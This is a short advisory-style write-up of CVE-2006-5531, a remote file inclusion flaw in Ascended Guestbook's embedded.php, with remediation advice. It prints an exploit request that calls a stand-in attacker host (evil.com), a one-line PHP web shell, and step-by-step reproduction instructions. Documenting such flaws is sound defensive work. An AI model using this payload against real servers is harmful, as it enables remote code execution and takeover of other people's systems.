CVE-2006-5531

An attacker sends an HTTP GET request to `embedded.php` with the `CONFIG[path]` parameter set to a URL pointing to a remote PHP shell. The vulnerable script then includes and executes the attacker-controlled file, allowing arbitrary PHP code execution on the server. The exploit shown in [ref_id=1] constructs a request such as `embedded.php?CONFIG[path]=http://evil.com/shell.txt?cmd=ls` to achieve remote code execution.

The vulnerable file is `embedded.php` in Ascended Guestbook 1.0.0 and earlier. The script unsafely uses the `CONFIG[path]` parameter from the HTTP request to include a remote file, without proper sanitization or validation.

No patch is provided in the bundle. The advisory [ref_id=1] does not include a fix; it only documents the exploit. To remediate this vulnerability, the application should avoid using user-supplied input in file inclusion functions like `include()` or `require()`, or strictly validate that the path is within an allowed whitelist of local files.

1. Host a PHP shell (e.g., `shell.txt` containing `<?php passthru($_GET["cmd"]);?>`) on an attacker-controlled web server. 2. Send a GET request to the target: `http://target/embedded.php?CONFIG[path]=http://attacker/shell.txt?cmd=ls`. 3. The output of the `ls` command will be returned in the HTTP response, confirming remote code execution [ref_id=1].